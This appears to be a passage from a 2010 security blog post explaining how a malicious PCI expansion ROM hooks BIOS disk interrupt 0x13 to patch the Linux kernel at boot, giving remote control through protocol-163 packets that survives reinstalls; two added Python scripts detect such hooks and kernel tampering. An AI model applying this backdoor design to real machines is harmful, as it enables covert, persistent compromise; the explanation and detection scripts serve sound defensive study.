The PCI specification defines an “expansion ROM” mechanism whereby a PCI card can include a bit of code for the BIOS to execute during the boot procedure. This is intended to give the hardware a chance to initialize itself, but we can also use it for our own purposes. To figure out what code we need to include on our expansion ROM, we need to know a little more about the boot process.

When a machine boots up, the BIOS initializes the hardware, then loads the master boot record from the boot device, generally a hard drive. Disks are traditionally divided into conceptual units called sectors of 512 bytes each. The master boot record is the first sector on the drive. After loading the master boot record into memory, the BIOS jumps to the beginning of the record.

On my test system, the master boot record was installed by GRUB. It contains code to load the rest of the GRUB boot loader, which in turn loads the /boot/vmlinuz-2.6.32-24-generic image from the disk and executes it. GRUB contains a built-in driver which understands the ext4 filesystem layout. However, it relies on the BIOS to actually read data from the disk, in much the same way that a user-level program relies on an operating system to access the hardware. Roughly speaking, when GRUB wants to read some sectors off the disk, it loads the start sector, number of sectors to read, and target address into registers, and then invokes the int 0x13 instruction to raise an interrupt. The CPU has a table of interrupt descriptors, which specify for each interrupt number a function pointer to call when that interrupt is raised. During initialization, the BIOS sets up these function pointers so that, for example, the entry corresponding to interrupt 0x13 points to the BIOS code handling hard drive IO.

Our expansion ROM is run after the BIOS sets up these interrupt descriptors, but before the master boot record is read from the disk. So what we’ll do in the expansion ROM code is overwrite the entry for interrupt 0x13. This is actually a legitimate technique which we would use if we were writing an expansion ROM for some kind of exotic hard drive controller, which a generic BIOS wouldn’t know how to read, so that we could boot off of the exotic hard drive. In our case, though, what we’re going to make the int 0x13 handler do is to call the original interrupt handler, then check whether the data we read matches one of the sectors of /boot/vmlinuz-2.6.32-24-generic that we need to patch. The ext4 filesystem stores files aligned on sector boundaries, so we can easily determine whether we need to patch a sector that’s just been read by inspecting the first few bytes of the sector. Then we return from our custom int 0x13 handler. The code for this handler will be stored on our expansion ROM, and the entry point of our expansion ROM will set up the interrupt descriptor entry to point to it.
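The hook described above leaves a trace that the on-disk kernel image does not: the real-mode interrupt vector table (IVT) at physical address 0 still records where each interrupt points once the BIOS and all expansion ROMs have run. The following script is an added example for defenders, not code from the original post: it decodes a raw 1 KiB dump of the IVT and lists every vector that points into the conventional option ROM area, which is exactly where an expansion ROM's handler would live. It assumes a legacy-BIOS PC with the usual first-megabyte layout (conventional RAM below 0xA0000, video RAM, option ROM space at 0xC0000–0xEFFFF, system BIOS at 0xF0000–0xFFFFF); the sample table, the segment values C000h and C800h, and the default vector F000:FF53 are all constructed for the self-test. As the post itself notes, a RAID or exotic disk controller hooks int 0x13 legitimately, so the output is an inventory to reconcile against the hardware you expect, not a verdict.

```python
import struct
import sys

IVT_ENTRIES = 256

# Conventional layout of the first megabyte on a legacy-BIOS PC. This is an
# assumption about a typical machine; check it against the firmware's own map.
REGIONS = (
    (0x00000, 0x9FFFF, "conventional RAM"),
    (0xA0000, 0xBFFFF, "video RAM"),
    (0xC0000, 0xEFFFF, "option ROM space"),
    (0xF0000, 0xFFFFF, "system BIOS"),
)


def vector(ivt, n):
    """Decode entry n of a raw IVT dump: each entry is a little-endian 16-bit
    offset followed by a 16-bit segment; physical address = segment*16 + offset."""
    off, seg = struct.unpack_from("<HH", ivt, n * 4)
    return seg, off, (seg << 4) + off


def region_of(phys):
    """Name the first-megabyte region a physical address falls in."""
    for lo, hi, name in REGIONS:
        if lo <= phys <= hi:
            return name
    return "beyond the first megabyte"


def option_rom_hooks(ivt):
    """List (int_no, seg, off, phys) for every vector that points into the
    option ROM region, i.e. every interrupt some expansion ROM has taken over."""
    hooks = []
    for n in range(IVT_ENTRIES):
        seg, off, phys = vector(ivt, n)
        if region_of(phys) == "option ROM space":
            hooks.append((n, seg, off, phys))
    return hooks


def build_ivt(entries, default=(0xF000, 0xFF53)):
    """Constructed IVT for testing: every vector points at `default` (an
    address inside the system BIOS) except those given as {int_no: (seg, off)}."""
    table = bytearray()
    for n in range(IVT_ENTRIES):
        seg, off = entries.get(n, default)
        table += struct.pack("<HH", off, seg)
    return bytes(table)


def sample_ivt():
    """Constructed sample: a video BIOS at C000h owns int 10h (normal on any
    PC), and a card at C800h has hooked int 13h, as the expansion ROM on the
    page does."""
    return build_ivt({0x10: (0xC000, 0x0100), 0x13: (0xC800, 0x0120)})


if __name__ == "__main__":
    if len(sys.argv) == 2:
        # A 1 KiB dump of physical address 0, e.g. taken from /dev/mem with dd
        # on a machine booted through a legacy BIOS.
        with open(sys.argv[1], "rb") as f:
            ivt = f.read(IVT_ENTRIES * 4)
    else:
        ivt = sample_ivt()
    for n, seg, off, phys in option_rom_hooks(ivt):
        print("int %02Xh -> %04X:%04X (phys 0x%05X) in %s"
              % (n, seg, off, phys, region_of(phys)))
```

On a legacy-BIOS Linux box the table can be captured with `dd if=/dev/mem bs=1024 count=1` as root, subject to the kernel's /dev/mem restrictions; a UEFI-booted machine has no meaningful IVT, and this check does not apply there. Compare the hooked-vector list against the cards you installed: an int 0x13 hook from a device that is not a storage controller is worth a closer look.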

In summary, the boot process of the system with our PCI card inserted looks like this:

  • The BIOS starts up and performs basic initialization, including setting up the interrupt descriptor table.
  • The BIOS runs our expansion ROM code, which hooks the int 0x13 handler so that it will apply our patch to the vmlinuz file when it is read off the disk.
  • The BIOS loads the master boot record installed by GRUB, and jumps to it. The master boot record loads the rest of GRUB.
  • GRUB reads the vmlinuz file from the disk, but our custom int 0x13 handler applies our patches to the kernel before returning.
  • GRUB jumps to the vmlinuz entry point, which decompresses the kernel image. Our modifications to vmlinuz cause it to overwrite a string constant with our exec_packet function and associated data, and also to overwrite the end of the startup code to install a pointer to this data in inet_protos[163].
  • The startup code of the decompressed kernel runs and installs our handler in inet_protos[163].
  • The kernel continues to boot normally.

We can now control the machine remotely over the Internet by sending it packets with protocol number 163.

One neat thing about this setup is that it’s not so easy to detect that anything unusual has happened. The running Linux system reads from the disk using its own drivers, not BIOS calls via the real-mode interrupt table, so inspecting the on-disk kernel image will correctly show that it is unmodified. For the same reason, if we use our remote control of the machine to install some malicious software which is then detected by the system administrator, the usual procedure of reinstalling the operating system and restoring data from backups will not remove our backdoor, since it is not stored on the disk at all.
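Because the patch is applied in memory while the on-disk files stay pristine, the only comparison that can catch it is running kernel versus on-disk kernel. The technique from the section above (repurposing a long, rarely triggered error message as scratch space) suggests a simple defender's check, written here as an added example that is not code from the original post: extract every long printable string from the on-disk vmlinux exactly as `strings | egrep '^.{180}'` does, then confirm each one still exists somewhere in a capture of kernel memory. It assumes you can obtain such a capture out of band (a hypervisor snapshot, a crash dump, or /proc/kcore on the host), and it uses the eCryptfs message quoted above as constructed sample data for its self-test, with 0x90 filler standing in for injected code.

```python
import re
import sys

# Minimum length used on the page: strings at least this long are the ones that
# could be repurposed as scratch space, so they are the ones worth checking.
MIN_LEN = 180

# The eCryptfs message quoted on the page, used here only as constructed sample
# data for the self-test below.
ECRYPTFS_MSG = (
    b"<4>Attempt to access file with crypto metadata only in the extended "
    b"attribute region, but eCryptfs was mounted without xattr support "
    b"enabled. eCryptfs will not treat this like an encrypted file."
)


def long_strings(blob, min_len=MIN_LEN):
    """Return (offset, bytes) for every run of printable ASCII of at least
    min_len bytes, the same lines `strings | egrep '^.{180}'` would list."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [(m.start(), m.group(0)) for m in pattern.finditer(blob)]


def missing_in_memory(disk_image, memory_image, min_len=MIN_LEN):
    """Return the long strings present in the on-disk kernel image but absent
    from the captured in-memory image, as (disk_offset, string) pairs.

    A substring search is used rather than an offset comparison, so the two
    captures need not share a layout; a string that has been overwritten with
    code or data will simply not be found anywhere in the memory capture."""
    return [(off, s) for off, s in long_strings(disk_image, min_len)
            if s not in memory_image]


def sample_images():
    """Constructed sample: a tiny 'disk' blob holding the eCryptfs message and
    a 'memory' blob in which that message has been replaced by filler bytes
    standing in for injected code. A short message survives in both."""
    disk = (b"\x00" * 64 + ECRYPTFS_MSG + b"\x00" * 16
            + b"short message\x00")
    mem = (b"\x00" * 64 + b"\x90" * len(ECRYPTFS_MSG) + b"\x00" * 16
           + b"short message\x00")
    return disk, mem


if __name__ == "__main__":
    if len(sys.argv) == 3:
        # Usage: python check_strings.py vmlinux kernel-memory.bin
        # How the memory capture is obtained is outside this script.
        with open(sys.argv[1], "rb") as f:
            disk = f.read()
        with open(sys.argv[2], "rb") as f:
            mem = f.read()
    else:
        disk, mem = sample_images()
    for off, s in missing_in_memory(disk, mem):
        print("0x%08x: %s..." % (off, s[:60].decode("ascii")))
```

Two caveats before acting on the output: strings that live in the kernel's init sections are freed after boot and will show up as missing for innocent reasons, and a capture taken by the compromised kernel itself could be lied to, which is why an out-of-band capture is preferable. Treat each reported string as a location to inspect, not as proof of tampering.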

What does all this mean in practice? Just like you should not run untrusted software, you should not install hardware provided by untrusted sources. Unless you work for something like a government intelligence agency, though, you shouldn’t realistically worry about installing commodity hardware from reputable vendors. After all, you’re already also trusting the manufacturer of your processor, RAM, etc., as well as your operating system and compiler providers. Of course, most real-world vulnerabilities are due to mistakes and not malice. An attacker can gain control of systems by exploiting bugs in popular operating systems much more easily than by distributing malicious hardware.


This entry was posted on Wednesday, October 27th, 2010 at 11:56 am and is filed under security.

 We need to get more open source hardware out there. http://en.wikipedia.org/wiki/Open-source_hardware
